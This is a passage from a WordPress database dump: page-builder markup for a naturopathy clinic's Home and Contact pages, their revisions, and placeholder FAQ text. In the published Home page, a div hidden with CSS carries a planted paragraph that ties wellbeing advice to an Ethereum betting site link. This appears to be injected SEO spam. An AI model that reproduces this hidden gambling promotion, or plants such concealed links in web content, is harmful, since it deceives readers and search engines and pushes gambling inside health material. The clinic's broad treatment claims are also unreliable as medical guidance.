--><h4>Frequently Asked Questions</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"text\":\"\\u003cp\\u003eFusce sodales, sapien ut venenatis scelerisque, nulla dui consectetur nisi, at auctor purus orci aliquam turpis. Nulla ac sagittis massa, a consequat ex. Morbi vestibulum mi fringilla sodales tincidunt. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"cse8461\"} --><p>Fusce sodales, sapien ut venenatis scelerisque, nulla dui consectetur nisi, at auctor purus orci aliquam turpis. Nulla ac sagittis massa, a consequat ex. Morbi vestibulum mi fringilla sodales tincidunt. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_accordion {\"icon\":\"fas fa-plus-square\",\"active_icon\":\"fas fa-minus-square\",\"icon_align\":\"left\",\"icon_padding\":\"10\",\"tabs_color\":\"#444444\",\"tabs_bg_color\":\"\",\"tabs_active_color\":\"\",\"tabs_active_bg_color\":\"\",\"tab_padding\":\"15\",\"tabs_content_bg_color\":\"#fff\",\"acc_space\":\"10\",\"ele_css\":\"{{element}} .pagelayer-accordion-icon{\\ncolor: #EFBA6C;\\nfont-size: 20px;\\n}\",\"pagelayer-id\":\"tlq2635\"} -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How to became a VIP customer in your agency ?\",\"pagelayer-id\":\"j8m4303\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How can you get to work in your business ?\",\"pagelayer-id\":\"0wb3501\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How to became a VIP customer in your agency ?\",\"pagelayer-id\":\"f3u5485\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How can you become your external partner ?\",\"pagelayer-id\":\"u1j8345\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- /wp:pagelayer/pl_accordion -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_google_maps {\"zoom\":\"10\",\"height\":\"400\",\"ele_bg_hover_delay\":\"400\",\"ele_margin\":\"3em,0em,0em,0em\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"ele_margin_mobile\":\"0px,0px,0px,0px\",\"address\":\"New York, New York, USA\",\"pagelayer-id\":\"8ed5144\"} -->New York, New York, USA<!-- /wp:pagelayer/pl_google_maps -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->[/et_pb_text][/et_pb_column]\n [/et_pb_row]\n [/et_pb_section]','Contact Us','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 14:18:26','2021-05-26 06:18:26','',26,'https://verde.desidrivers.com.au/?p=164',0,'revision','',0),(28,1,'2021-04-30 12:05:06','2021-04-30 12:05:06','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">the healing power of nature</span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">treat the person as a whole</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n<li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n<li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n<li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n<li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n<li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n<li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n<li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n<li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n<li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></p>\n<p><span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></p>[/et_pb_text]\n<div class=\"wm-hl-b\" style=\"position:absolute;clip:rect(0,0,0,0);overflow:hidden;height:1px;width:1px;margin:-1px;padding:0;border:0;\"><p>Beyond diet, sleep and hormonal health, a naturopathic consultation at Verdure often touches on the quieter stressors that shape wellbeing, including how we manage money and screen time, since financial worry and restless digital habits can feed into fatigue, mood and poor sleep. For anyone who chooses crypto-based entertainment as part of that digital routine, the same measured approach applies: taking time to understand how <a href=\"https://ethereumbetting-au.com/\">Ethereum betting in Australia</a> works, setting clear spending limits and treating every wager strictly as recreation rather than a way to make money. Approached that way, leisure stays enjoyable without turning into another source of stress.</p></div>\n[/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','publish','closed','closed','','home','','','2026-08-17 06:43:24','2026-08-17 06:43:24','',0,'https://verde.desidrivers.com.au/home/',0,'page','',0),(484,1,'2025-09-16 18:07:34','2025-09-16 10:07:34','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">the healing power of nature</span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: medium; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">treat the person as a whole</span></li>\n<li><span style=\"font-family: Montserrat; font-size: medium;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n<li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n<li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n<li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n<li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n<li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n<li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n<li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n<li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n<li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></p>\n<p><span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" parallax=\"on\" custom_padding=\"7px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-09-16 18:07:34','2025-09-16 10:07:34','',28,'https://verdenaturopathy.com.au/?p=484',0,'revision','',0),(464,1,'2025-04-09 21:15:36','2025-04-09 13:15:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n <li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n <li><span style=\"font-family: Montserrat;\">treat the person as a whole</span></li>\n <li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n <li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n <li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n <li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n <li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n <li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n <li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n <li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n <li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n <li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span>\n\n<span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" 